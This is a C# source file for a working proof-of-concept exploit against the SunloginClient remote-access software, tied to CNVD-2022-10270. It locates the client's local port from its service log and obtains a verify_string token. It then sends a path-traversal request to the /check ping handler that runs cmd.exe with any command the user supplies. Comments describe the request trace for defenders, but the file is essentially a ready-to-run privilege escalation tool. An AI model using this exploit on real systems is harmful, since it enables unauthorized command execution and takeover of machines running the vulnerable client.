CNVD-2022-10270-LPE/sunloginLPE/Program.cs

using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Text.RegularExpressions;
using System.Net;
namespace sunloginLPE
{
internal class Program
{
    // Proof-of-concept for the SunloginClient local RPC issue tracked as CNVD-2022-10270
    // (the repository path names it). Flow, driven by Main: locate the newest
    // sunlogin_service.* log, read the listening port from its "start listen OK" line,
    // fetch a verify_string from /cgi-bin/rpc?action=verify-haras, then call /check with
    // that value as the CID cookie.
    //
    // Defender notes: every request goes to 127.0.0.1 over plain HTTP, so the observable
    // trace on the host is a local request to the client's listening port for
    // /cgi-bin/rpc?action=verify-haras followed by /check?cmd=ping..%2F.. carrying a
    // "Cookie: CID=" header. The weakness this depends on is the /check handler accepting
    // a path-traversal argument to its ping command.

    /// <summary>
    /// Returns the full path of the newest file under <paramref name="Path"/> whose full
    /// path contains "sunlogin_service.", considering only the <paramref name="count"/>
    /// files with the most recent CreationTime.
    /// </summary>
    /// <param name="Path">Directory to scan (top level only; Directory.GetFiles is not recursive here).</param>
    /// <param name="count">How many of the newest files to examine.</param>
    /// <returns>
    /// The matching full path, or "" (after printing "[-] logFile not found") when none of
    /// the newest <paramref name="count"/> files matches.
    /// </returns>
    /// <remarks>
    /// Directory.GetFiles throws when the directory does not exist; Main catches that and
    /// prints the exception. The "sunlogin_service." check is against the full path, not
    /// just the file name.
    /// </remarks>
    static string GetLatestFiles(string Path, int count)
    {
        // Newest-first by CreationTime, then keep only the first `count` entries.
        var query = (from f in Directory.GetFiles(Path)
                     let fi = new FileInfo(f)
                     orderby fi.CreationTime descending
                     select fi.FullName).Take(count);
        string[] files = query.ToArray();
        for (int i = 0; i < files.Length; i++)
        {
            if (files[i].Contains("sunlogin_service."))
            {
                return files[i];
            }
        }
        Console.WriteLine("[-] logFile not found");
        return "";
    }

    /// <summary>
    /// Extracts the SunloginClient listening port from the newest service log under
    /// <paramref name="path"/>\log.
    /// </summary>
    /// <param name="path">SunloginClient install directory; "\log" is appended here.</param>
    /// <returns>
    /// The last 5-digit run inside the last "start listen OK...," match in the log, or ""
    /// when no log file was found or neither pattern matched.
    /// </returns>
    static string getPort(string path)
    {
        // Only the two newest files in the log directory are considered.
        string logFile = GetLatestFiles(path + "\\log", 2);
        string port = "";
        string s;
        if (logFile != "")
        {
            // FileShare.ReadWrite lets the open succeed even if another process holds the
            // log open for writing — presumably the running service; not confirmed here.
            // NOTE(review): fs and sr are never closed/disposed; the handle lives until GC.
            FileStream fs = new FileStream(logFile, FileMode.Open, FileAccess.Read, FileShare.ReadWrite);
            StreamReader sr = new StreamReader(fs, System.Text.Encoding.Default);
            s = sr.ReadToEnd();
            // First pass: "start listen OK" followed by non-whitespace up to a comma.
            string pattern = @"\bstart listen OK\S*\,";
            // Second pass: any run of exactly five digits within that match.
            string pattern2 = @"\d{5}";
            string res = "";
            MatchCollection mc = Regex.Matches(s, pattern);
            // Each loop keeps only the LAST match, i.e. the most recent occurrence in the file.
            foreach (Match m in mc)
                res = m.Value;
            MatchCollection mc2 = Regex.Matches(res, pattern2);
            foreach (Match m2 in mc2)
                port = m2.Value;
        }
        return port;
    }

    /// <summary>
    /// Sends an HTTP GET to <c>url?requestData</c> and returns the body decoded with
    /// Encoding.Default.
    /// </summary>
    /// <param name="url">Base URL without a query string.</param>
    /// <param name="requestData">Raw query string; it is appended verbatim, so callers pass it already encoded.</param>
    /// <returns>The response body.</returns>
    /// <exception cref="WebException">Propagated from GetResponse on connection failure or a non-success status.</exception>
    /// <remarks>NOTE(review): the HttpWebResponse is never disposed; only the stream and reader are closed.</remarks>
    private static String HttpGet(string url, string requestData)
    {
        // Build the request object.
        HttpWebRequest request = (HttpWebRequest)WebRequest.Create(url + "?" + requestData);
        request.Method = "GET";
        request.ContentType = "text/html; charset=UTF-8";
        // Get the response object and read the response body.
        HttpWebResponse response = (HttpWebResponse)request.GetResponse();
        Stream responseStream = response.GetResponseStream();
        StreamReader sReader = new StreamReader(responseStream, Encoding.Default);
        String result = sReader.ReadToEnd();
        sReader.Close();
        responseStream.Close();
        return result;
    }

    /// <summary>
    /// Same as <see cref="HttpGet"/> but also sends a <c>Cookie: CID=&lt;cookie&gt;</c>
    /// header.
    /// </summary>
    /// <param name="url">Base URL without a query string.</param>
    /// <param name="requestData">Raw query string, appended verbatim.</param>
    /// <param name="cookie">Value placed after "CID=" in the Cookie header.</param>
    /// <returns>The response body decoded with Encoding.Default.</returns>
    /// <exception cref="WebException">Propagated from GetResponse on connection failure or a non-success status.</exception>
    /// <remarks>NOTE(review): as in HttpGet, the HttpWebResponse is never disposed.</remarks>
    private static String HttpGetWithCookie(string url, string requestData,string cookie)
    {
        // Build the request object.
        HttpWebRequest request = (HttpWebRequest)WebRequest.Create(url + "?" + requestData);
        request.Method = "GET";
        request.ContentType = "text/html; charset=UTF-8";
        request.Headers.Add("Cookie", "CID=" + cookie);
        // Get the response object and read the response body.
        HttpWebResponse response = (HttpWebResponse)request.GetResponse();
        Stream responseStream = response.GetResponseStream();
        StreamReader sReader = new StreamReader(responseStream, Encoding.Default);
        String result = sReader.ReadToEnd();
        sReader.Close();
        responseStream.Close();
        return result;
    }

    /// <summary>
    /// Runs the two-request sequence against the local client: obtain the verify_string
    /// from /cgi-bin/rpc?action=verify-haras, then call /check with it as the CID cookie.
    /// </summary>
    /// <param name="SunloginClient_port">Port returned by <see cref="getPort"/>.</param>
    /// <param name="ExecCmd">Command text; spaces are replaced with '+' before it is placed in the query string.</param>
    /// <returns>The body of the /check response, which Main prints as the command output.</returns>
    /// <exception cref="WebException">From either HTTP call; Main catches and prints it.</exception>
    static string exp(string SunloginClient_port,string ExecCmd)
    {
        String targetUrl = "http://127.0.0.1:" + SunloginClient_port + "/cgi-bin/rpc";
        String response = HttpGet(targetUrl, "action=verify-haras");
        // Matches the literal text  verify_string":"<value>"  in the JSON body; the
        // capture group is optional, so an empty value still matches.
        string pattern = "verify_string\":\"(\\w+)?\"";
        string cid = "";
        MatchCollection mc = Regex.Matches(response, pattern);
        // Keeps the last match; cid holds the whole matched text at this point.
        foreach (Match m in mc)
            cid = m.Value;
        // Strip the quotes, then the "verify_string:" prefix that remains, leaving the value.
        // If nothing matched, cid stays "" and the next request is sent with an empty CID.
        cid = cid.Replace("\"", "").Replace("verify_string:", "");
        Console.WriteLine("[+] CID=" +cid);
        targetUrl = "http://127.0.0.1:" + SunloginClient_port + "/check";
        // The query passes a path-traversal argument to the handler's ping command; this is
        // the server-side weakness the PoC relies on, and the request never leaves localhost.
        response = HttpGetWithCookie(targetUrl, "cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows\\system32\\cmd.exe+/c+" + ExecCmd.Replace(" ","+"),cid);
        return response;
    }

    /// <summary>
    /// Entry point. Usage: <c>sunloginLPE.exe Cmd [sunloginClientPath]</c>; the path
    /// defaults to the Oray SunloginClient install directory under Program Files.
    /// </summary>
    /// <param name="args">args[0] is the command text, optional args[1] overrides the install path.</param>
    /// <remarks>
    /// NOTE(review): every failure path calls Environment.Exit(0) or falls through after
    /// printing, so the process exit code is 0 even on error; scripts cannot distinguish
    /// success from failure by status.
    /// </remarks>
    static void Main(string[] args)
    {
        Console.WriteLine("[!] Usage: sunloginLPE.exe Cmd [sunloginClientPath]DefaultPath = C:\\Program Files\\Oray\\SunLogin\\SunloginClient");
        string defaultPath = "C:\\Program Files\\Oray\\SunLogin\\SunloginClient";
        string cmd = "";
        string path = defaultPath;
        string port = "";
        // Exactly one or two arguments are accepted; anything else exits.
        if(args.Length == 1)
        {
            cmd = args[0];
        }
        else if(args.Length == 2)
        {
            cmd=args[0];
            path =args[1];
        }
        else
        {
            Console.WriteLine("[-] wrong number of parameters");
            System.Environment.Exit(0);
        }
        try
        {
            port = getPort(path);
            if(port != "")
            {
                Console.WriteLine("[+] SunloginClient port is " + port);
            }
            else
            {
                Console.WriteLine("[-] SunloginClient port not found");
                System.Environment.Exit(0);
            }
            // Prints the /check response body (string literal is Chinese for "command output").
            Console.WriteLine("[+] 命令执行结果: \n" + exp(port, cmd));
        }
        catch(Exception ex)
        {
            // Any I/O, directory or HTTP failure lands here; the full exception is printed.
            Console.WriteLine("[-] " + ex.ToString());
        }
    }
}
}